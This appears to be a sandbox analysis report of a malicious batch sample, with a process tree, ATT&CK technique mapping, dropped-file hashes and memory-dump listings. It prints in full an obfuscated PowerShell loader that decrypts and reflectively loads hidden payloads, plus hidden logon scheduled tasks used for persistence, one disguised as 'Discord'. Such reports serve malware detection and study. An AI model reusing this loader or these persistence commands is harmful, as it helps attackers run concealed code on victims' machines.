PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1200

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1484

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:3108

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1584

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1816

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1896

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2128

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2528

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2540

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2572

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2604

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3256

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77-Built.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$77-Built.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$77-Built.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_182_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_182.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_182.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_182.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_182.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_182.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4224

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
7⤵
- Executes dropped EXE
PID:1376

C:\Users\Admin\AppData\Local\Temp\Client-built.exe
"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
7⤵
- Executes dropped EXE
PID:916

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:4548

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3880

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4060

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4752

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3520

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:4020

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4964

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:2672

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:4376

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:5000

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:1700

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ab64146204d66061fe4c21f85f2c5716

SHA1
356e840a0baf272181fa336020201f53ecfd56d8

SHA256
7a0e5fda0f4b068cd5dc8834d2b45a1102219e606098d0de27f6d331d14ef7c9

SHA512
50fb9c39b7b9ef62f06b8c8eace49734b1f3ce22a5e20eab2da342e2bdc12316b0f06ba12b09fcac0c53a39c606daced67605e67517e9e606fb639f9522b1913

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client-built.exe

Filesize
3.1MB

MD5
4de93a204d54204a0798175c8457a2de

SHA1
38abe30fa70c599846e0b777d4ee62422781837f

SHA256
7333499e805ad534c6f65623adf4600c0484830cefa08c0a75f98b46a929fefb

SHA512
e3ae4e2c84dec014dd15bc29faa9767214972eef8bdee9db063f4fbe059549212f17c69f06a78a12880f53a766e357c73eae6763f2452fb4eff2302f5396304a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
163KB

MD5
b51552b77057c2405f73bbbf9c89234a

SHA1
4793adbba023f90d2d2ad0ec55199c56de815224

SHA256
720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0

SHA512
564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hy0prbld.l4r.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_182.bat

Filesize
3.5MB

MD5
297d7e65305917b5a212ca9f4b4d99d2

SHA1
402192fd3b13ea1fd26403e227ceb119e8569b4c

SHA256
cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9

SHA512
6055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_182.vbs

Filesize
115B

MD5
44116e0e2772e08deeb73293aac7ea83

SHA1
6bd666f79b09fbc06c56b13f62ef024e58878e84

SHA256
acd5d5d605e00fe7b43206e13818a080f7d11105077f7a988a35f7db1c44cb2b

SHA512
b67ad508a826b490d2b38731fa177f9cd67841ac4d04ce137dc8fd02e598ce124b150a2d67e67b6abbda800d1b217b3ab550aedfcf19fa6e7b0dbfc12cc6697d

Download Submit
memory/552-185-0x00000207145E0000-0x000002071460A000-memory.dmp

Filesize
168KB

Download
memory/552-191-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmp

Filesize
64KB

Download
memory/552-184-0x00000207145E0000-0x000002071460A000-memory.dmp

Filesize
168KB

Download
memory/552-190-0x00000207145E0000-0x000002071460A000-memory.dmp

Filesize
168KB

Download
memory/552-183-0x00000207141E0000-0x0000020714205000-memory.dmp

Filesize
148KB

Download
memory/632-200-0x0000019AD86D0000-0x0000019AD86FA000-memory.dmp

Filesize
168KB

Download
memory/632-195-0x0000019AD86D0000-0x0000019AD86FA000-memory.dmp

Filesize
168KB

Download
memory/632-201-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmp

Filesize
64KB

Download
memory/724-211-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmp

Filesize
64KB

Download
memory/724-210-0x00000201D7910000-0x00000201D793A000-memory.dmp

Filesize
168KB

Download
memory/724-205-0x00000201D7910000-0x00000201D793A000-memory.dmp

Filesize
168KB

Download
memory/900-221-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmp

Filesize
64KB

Download
memory/900-215-0x0000021B123E0000-0x0000021B1240A000-memory.dmp

Filesize
168KB

Download
memory/900-220-0x0000021B123E0000-0x0000021B1240A000-memory.dmp

Filesize
168KB

Download
memory/916-136-0x00000000009D0000-0x0000000000CF4000-memory.dmp

Filesize
3.1MB

Download
memory/1000-225-0x00000164F0D10000-0x00000164F0D3A000-memory.dmp

Filesize
168KB

Download
memory/1000-230-0x00000164F0D10000-0x00000164F0D3A000-memory.dmp

Filesize
168KB

Download
memory/1000-231-0x00007FFF6A270000-0x00007FFF6A280000-memory.dmp

Filesize
64KB

Download
memory/1056-41-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/1056-74-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/1056-42-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/2792-172-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2792-169-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2792-180-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2792-179-0x00007FFFA9410000-0x00007FFFA94BE000-memory.dmp

Filesize
696KB

Download
memory/2792-170-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2792-171-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2792-178-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/2792-174-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4224-118-0x0000020C7B110000-0x0000020C7B434000-memory.dmp

Filesize
3.1MB

Download
memory/4516-166-0x000001FC9A650000-0x000001FC9A67A000-memory.dmp

Filesize
168KB

Download
memory/4516-167-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/4516-168-0x00007FFFA9410000-0x00007FFFA94BE000-memory.dmp

Filesize
696KB

Download
memory/5028-4-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/5028-28-0x00000266C6FC0000-0x00000266C6FC8000-memory.dmp

Filesize
32KB

Download
memory/5028-23-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/5028-12-0x00000266C7510000-0x00000266C7586000-memory.dmp

Filesize
472KB

Download
memory/5028-29-0x00000266E79F0000-0x00000266E7E8E000-memory.dmp

Filesize
4.6MB

Download
memory/5028-7-0x00000266C7230000-0x00000266C7252000-memory.dmp

Filesize
136KB

Download
memory/5028-6-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/5028-5-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download
memory/5028-111-0x00007FFFAA1E0000-0x00007FFFAA3BB000-memory.dmp

Filesize
1.9MB

Download